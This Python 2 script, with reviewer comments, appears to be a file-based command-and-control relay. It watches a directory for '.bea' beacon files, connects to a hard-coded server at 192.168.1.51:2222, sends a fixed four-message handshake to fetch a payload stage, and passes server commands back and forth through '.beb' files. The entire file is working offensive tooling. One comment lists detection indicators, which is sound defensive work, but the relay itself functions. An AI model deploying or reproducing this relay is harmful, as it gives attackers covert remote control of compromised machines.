#!/usr/bin/python
import socket
import sys
import os
from time import sleep
import struct
def createSocket():
    """Open a TCP connection to the hard-coded peer and wrap it in a dict.

    Returns a dict with two keys: ``'sock'`` (the connected socket) and
    ``'state'`` (initialised to 1; the main loop later moves it to 2).
    The peer address 192.168.1.51:2222 is fixed in this function.
    """
    conn = socket.create_connection(('192.168.1.51', 2222))
    return {'sock': conn, 'state': 1}
def recv_frame(sock):
    """Read one length-prefixed frame from ``sock``.

    Wire format (the mirror of send_frame): a 4-byte little-endian
    unsigned length, then that many payload bytes.

    Returns the payload, or an empty value when no frame could be read.
    NOTE(review): the empty results are inconsistent -- "" after a
    recv() error, () after a short header -- so callers can only rely
    on ``len(ret) == 0``, not on the type.
    """
    try:
        chunk = sock.recv(4)
    except:  # bare except: swallows every error, including KeyboardInterrupt
        return("")
    if len(chunk) < 4:
        return()
    slen = struct.unpack('<I', chunk)[0]
    chunk = sock.recv(slen)
    # recv() may return less than requested, so keep reading until the
    # whole payload is in. NOTE(review): if the peer closes mid-frame,
    # recv() returns an empty string forever and this loop never ends.
    while len(chunk) < slen:
        chunk = chunk + sock.recv(slen - len(chunk))
    return(chunk)
def send_frame(sock, chunk):
    """Write ``chunk`` to ``sock`` as one frame.

    The frame is a 4-byte little-endian unsigned length followed by the
    payload, pushed out in a single sendall() call so header and body
    cannot be split by a partial write.
    """
    header = struct.pack('<I', len(chunk))
    sock.sendall(header + chunk)
def getStage(sock):
    """Send the fixed four-message handshake and return the peer's reply.

    The four option strings are sent as separate frames, in this order,
    and the first frame the peer sends back is returned unchanged (an
    empty value if recv_frame could not read one).
    """
    for option in ("arch=x86", "pipename=foobar", "block=100", "go"):
        send_frame(sock, option)
    return recv_frame(sock)
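def closeSocket(socket):
    """Close the socket passed in.

    The parameter name shadows the ``socket`` module inside this
    function; it is kept for compatibility with existing callers.
    The original body closed a module-level ``sock`` instead of the
    argument (a NameError until the main loop had assigned one), which
    is fixed here by closing the argument itself.
    """
    socket.close()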
# Main polling loop: bridges "*.bea" files in the working directory to one
# TCP session per file, using the framing defined by send_frame/recv_frame.
#
# Observable behaviour (all visible in this file):
#   * once per second, every "*.bea" file in the working directory is examined;
#   * a non-empty "*.bea" not yet in ``beacons`` opens a connection via
#     createSocket() (fixed peer 192.168.1.51:2222), runs the constant
#     getStage() handshake and writes the reply to "<name>.beb";
#   * a non-empty "*.bea" already in ``beacons`` is sent as one frame, the
#     file is truncated, and a reply longer than 1 byte goes to "<name>.beb";
#   * an empty "*.bea" whose entry is in state 2 is polled with a single
#     "\0" frame and any reply longer than 1 byte goes to "<name>.beb";
#   * an empty "*.bea" that is not in ``beacons`` is deleted with its ".beb".
# For detection purposes the constant length-prefixed framing, the fixed
# handshake strings, the hard-coded peer and the ".bea"/".beb" churn in a
# single directory are the stable indicators this script exposes.
# NOTE(review): the listing lost its indentation; the nesting below is
# reconstructed, and the placement of the state upgrade and the second
# truncate in the first branch is a best guess.
beacons = {}  # maps "<name>.bea" -> {'sock': socket, 'state': 1 or 2}
while(True):
    files = os.listdir("./")
    for ffile in files:
        sys.stdout.flush()
        if ffile.strip()[-4:] == ".bea":
            fsize = os.stat(ffile).st_size
            #print "processing %s [%s bytes]"%(ffile,fsize)
            if ffile in beacons and fsize > 0:
                # Known beacon with pending data: forward the file as one frame.
                sock = beacons[ffile]['sock']
                print "#%d"%fsize,
                sleep(1)
                f = open(ffile,'rb')
                chunk = f.read()
                f.close()
                #print "send frame %s, and clear bea"%len(chunk)
                send_frame(sock,chunk)
                open(ffile, 'w').close()  # truncate: the data has been sent
                sleep(1)
                #print "recv frame"
                ret = recv_frame(sock)
                #discard all under 2 bytes
                if len(ret) > 1:
                    print "got %s bytes command"%len(ret)
                    f = open("%s.beb"%ffile[:-4], 'wb')
                    f.write(ret)
                    f.close()
                    # clear input queue
                    #let's assume we hit this once and upgrade status
                    beacons[ffile]['state'] = 2
                    open(ffile, 'w').close()
            elif ffile not in beacons and fsize > 0:
                # New beacon file: connect, run the handshake, store the reply.
                print "N"
                beacons[ffile] = createSocket()
                #we need a stager and socket
                ret = getStage(beacons[ffile]['sock'])
                if len(ret) > 0:
                    print "got %s bytes command"%len(ret)
                    # NOTE(review): this handle is never used or closed;
                    # the next line rebinds f, leaking the descriptor.
                    f = open(ffile,'rb')
                    f = open("%s.beb"%ffile[:-4], 'wb')
                    f.write(ret)
                    f.close()
                    # clear input queue
                    open(ffile, 'w').close()
            elif ffile in beacons and fsize == 0:
                #print "ff niet"
                # Known beacon with nothing to send: only poll once it has
                # reached state 2; state 1 entries are left alone here.
                if beacons[ffile]['state'] == 2:
                    #let's check for new commands waiting on socket just pump some in to get a response
                    print "0",
                    send_frame(beacons[ffile]['sock'],"\0")
                    ret = recv_frame(beacons[ffile]['sock'])
                    if len(ret) > 1:
                        print "got %s bytes command"%len(ret)
                        f = open("%s.beb"%ffile[:-4], 'wb')
                        f.write(ret)
                        f.close()
                        # clear input queue
                        #open(ffile, 'w').close()
            else:
                #old files delete them
                # Reached only for an empty "*.bea" with no ``beacons`` entry.
                # Either way the for-loop is abandoned; the bare except hides
                # the reason when a remove() fails.
                try:
                    os.remove(ffile)
                    os.remove("%s.beb"%ffile[:-4])
                    break
                except:
                    break
    print ".",
    sleep(1)